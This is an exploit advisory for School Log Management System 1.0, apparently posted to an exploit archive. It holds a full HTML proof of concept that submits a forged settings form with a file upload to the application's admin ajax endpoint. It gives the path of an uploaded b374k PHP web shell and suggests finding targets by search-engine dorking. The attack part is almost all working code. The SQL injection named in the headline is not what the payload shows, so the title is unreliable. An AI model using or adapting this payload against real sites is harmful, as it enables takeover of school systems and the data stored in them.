Headline
School Log Management System 1.0 SQL Injection / Code Execution
School Log Management System version 1.0 appears to suffers from a remote SQL injection vulnerability that allows an attacker to achieve code execution.
=============================================================================================================================================| # Title : School Log Management System 1.0 WYSIWYG Settings Management Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) || # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Part 01 : about-us.php[+] This payload injects code of your choice into the database via Froala is a WYSIWYG editor V: 4.2.1 . [+] Line 109 : Send the form data using fetch API (Set your target url)[+] save payload as poc.html[+] payload : <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Settings Management</title> <!-- Froala Editor CSS --> <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet"> <!-- Bootstrap CSS --> <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet"> <style> /* Custom Styles */ #cimg { max-width: 100%; height: auto; } #preloader2 { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.5); display: flex; justify-content: center; align-items: center; z-index: 9999; } .form-group { margin-bottom: 1rem; } .form-group label { display: block; margin-bottom: .5rem; } .form-group input, .form-group textarea { width: 100%; padding: .5rem; box-sizing: border-box; } </style></head><body> <div class="container"> <form id="manage-settings" method="post" enctype="multipart/form-data"> <div class="form-group"> <label for="name"> Name</label> <input type="text" id="name" name="name" required> </div> <div class="form-group"> <label for="email">Email</label> <input type="email" id="email" name="email" required> </div> <div class="form-group"> <label for="contact">Contact</label> <input type="tel" id="contact" name="contact" required> <div class="form-group"> <label for="about">About Content</label> <textarea class="text-jqte" id="about" name="about"></textarea> </div> <div class="form-group"> <label for="img">Cover Image</label> <input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)"> <img id="cimg" src="" alt="Selected Image Preview"> </div> <button type="submit" class="btn btn-primary">Save Settings</button> </form> </div> <div class="modal fade" id="viewer_modal" role='dialog'> <div class="modal-dialog modal-md" role="document"> <div class="modal-content"> <button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button> <img src="" alt=""> </div> </div> </div> <!-- jQuery --> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> <!-- Froala Editor JS --> <script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script> <!-- Bootstrap JS (for modals) --> <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script> <script> function displayImg(input, _this) { if (input.files && input.files[0]) { var reader = new FileReader(); reader.onload = function (e) { $('#cimg').attr('src', e.target.result); } reader.readAsDataURL(input.files[0]); } } $(document).ready(function () { const editorInstance = new FroalaEditor('.text-jqte'); }); $('#manage-settings').submit(function (e) { e.preventDefault(); start_load(); $.ajax({ url: 'http://127.0.0.1/slms/admin/ajax.php?action=save_settings', data: new FormData($(this)[0]), cache: false, contentType: false, processData: false, method: 'POST', type: 'POST', error: err => { console.log(err); }, success: function (resp) { if (resp == 1) { alert_toast('Data successfully saved.', 'success'); setTimeout(function () { location.reload(); }, 1000); } } }); }); window.start_load = function () { $('body').prepend('<div id="preloader2"></div>'); } window.end_load = function () { $('#preloader2').fadeOut('fast', function () { $(this).remove(); }); } window.viewer_modal = function ($src = '') { start_load(); var t = $src.split('.'); t = t[1]; if (t == 'mp4') { var view = $("<video src='" + $src + "' controls autoplay></video>"); } else { var view = $("<img src='" + $src + "' />"); } $('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove(); $('#viewer_modal .modal-content').append(view); $('#viewer_modal').modal({ show: true, backdrop: 'static', keyboard: false, focus: true }); end_load(); } window.uni_modal = function ($title = '', $url = '', $size = "") { start_load(); $.ajax({ url: $url, error: err => { console.log(err); alert("An error occurred"); }, success: function (resp) { if (resp) { $('#uni_modal .modal-title').html($title); $('#uni_modal .modal-body').html(resp); if ($size != '') { $('#uni_modal .modal-dialog').addClass($size); } else { $('#uni_modal .modal-dialog').removeAttr("class").addClass("modal-dialog modal-md"); } $('#uni_modal').modal({ show: true, backdrop: 'static', keyboard: false, focus: true }); end_load(); } } }); } window._conf = function ($msg = '', $func = '', $params = []) { $('#confirm_modal #confirm').attr('onclick', $func + "(" + $params.join(',') + ")"); $('#confirm_modal .modal-body').html($msg); $('#confirm_modal').modal('show'); } window.alert_toast = function ($msg = 'TEST', $bg = 'success') { $('#alert_toast').removeClass('bg-success bg-danger bg-info bg-warning'); if ($bg == 'success') $('#alert_toast').addClass('bg-success'); if ($bg == 'danger') $('#alert_toast').addClass('bg-danger'); if ($bg == 'info') $('#alert_toast').addClass('bg-info'); if ($bg == 'warning') $('#alert_toast').addClass('bg-warning'); $('#alert_toast .toast-body').html($msg); $('#alert_toast').toast({ delay: 3000 }).toast('show'); } </script></body></html>[+] Path : background: url(admin/assets/uploads/1724235960_b374k.php);Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================